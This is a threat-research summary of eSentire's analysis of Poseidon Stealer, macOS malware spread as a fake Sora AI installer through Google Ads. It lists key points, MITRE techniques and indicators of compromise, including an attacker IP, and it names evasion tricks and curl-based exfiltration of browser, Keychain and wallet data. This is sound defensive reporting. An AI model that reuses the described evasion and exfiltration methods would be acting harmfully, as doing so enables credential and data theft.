Threat Research

Poseidon Stealer Deploys Sopha AI Bait to Compromise macOS Systems

Esentire

Threat researchers from eSentire TRU analyzed Poseidon Stealer, a macOS-targeting malware that disguises itself as legitimate software to steal sensitive data. The report emphasizes user awareness and endpoint monitoring as key defenses against this deception and data exfiltration campaign. #PoseidonStealer #macOS #SoraAI #OpenAI #GoogleAds

Keypoints

  • Poseidon Stealer was identified by eSentire’s Threat Response Unit (TRU) in August 2024 as targeting macOS devices.
  • Initial access occurred via a drive-by download from a Google Ads link leading to a DMG masquerading as Sora AI installer.
  • The malware disguises itself as legitimate software (InstallSoraAI.dmg) and uses terminal tricks to evade detection (e.g., disown, pkill Terminal).
  • It collects data from browsers, Keychain, Notes, documents, wallets, VPN configs, and more, up to a 210 MB limit, before exfiltration.
  • Exfiltration is performed to a remote server via curl with custom headers (UUID, buildid, username).
  • TRU recommends user training (PSAT), a corporate software center, and strong endpoint protection, plus monitoring of AppleScript/osascript execution.
  • Indicators of compromise and detailed steps are provided in TRU notes and linked resources.

MITRE Techniques

  • [T1071.001] Initial Access – Drive-by download via malicious links. – “Drive-by download via malicious links.”
  • [T1203] Execution – Execution of malicious payload disguised as legitimate software. – “Execution of malicious payload disguised as legitimate software.”
  • [T1053] Persistence – Using terminal commands to maintain persistence. – “Using terminal commands to maintain persistence.”
  • [T1555] Credential Access – Fake password prompts to capture user credentials. – “Fake password prompts to capture user credentials.”
  • [T1041] Exfiltration – Exfiltration of collected data to a remote server using curl. – “Exfiltration of collected data to a remote server using curl.”

Indicators of Compromise

  • [File Name] – InstallSoraAI.dmg, out.zip
  • [Directory] – /tmp/xuyna/
  • [File Name] – masterpass-chrome
  • [IP Address] – 45.93.20.174
  • [Domain] – 45.93.20[.]174
  • [URL] – hxxp://45.93.20[.]174/p2p

Read more: https://www.esentire.com/blog/poseidon-stealer-uses-sopha-ai-lure-to-infect-macos

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint